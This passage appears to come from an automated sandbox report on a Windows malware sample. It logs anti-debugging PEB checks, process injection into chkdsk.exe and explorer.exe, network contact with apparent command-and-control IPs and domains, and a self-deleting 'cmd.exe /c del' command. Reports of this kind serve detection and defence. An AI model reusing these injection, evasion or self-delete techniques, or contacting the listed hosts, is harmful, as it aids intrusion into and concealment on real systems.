          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D98794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D91B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 166.88.62.202 80
          Source: C:\Windows\explorer.exe Domain query: www.casatowerofficial.com
          Source: C:\Windows\explorer.exe Domain query: www.bitconga.com
          Source: C:\Windows\explorer.exe Domain query: www.totalwinerewards.com
          Source: C:\Windows\explorer.exe Network Connect: 199.59.243.200 80
          Source: C:\Windows\explorer.exe Domain query: www.tothelaundry.com
          Source: C:\Windows\explorer.exe Domain query: www.omnipets.store
          Source: C:\Windows\explorer.exe Network Connect: 46.252.151.235 80
          Source: C:\Windows\explorer.exe Network Connect: 18.231.72.25 80
          Source: C:\Windows\explorer.exe Domain query: www.webarate.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Domain query: www.experiencedlawfirms.com
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 90000
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Memory written: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Process created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: explorer.exe, 00000005.00000000.381888349.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.363941533.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.348780458.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.443876033.0000000000B68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman\Pr
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.386172183.0000000005E10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.364384709.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.349323841.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.444216866.00000000011E0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.382222275.00000000011E0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.374858871.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.390116935.0000000008778000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
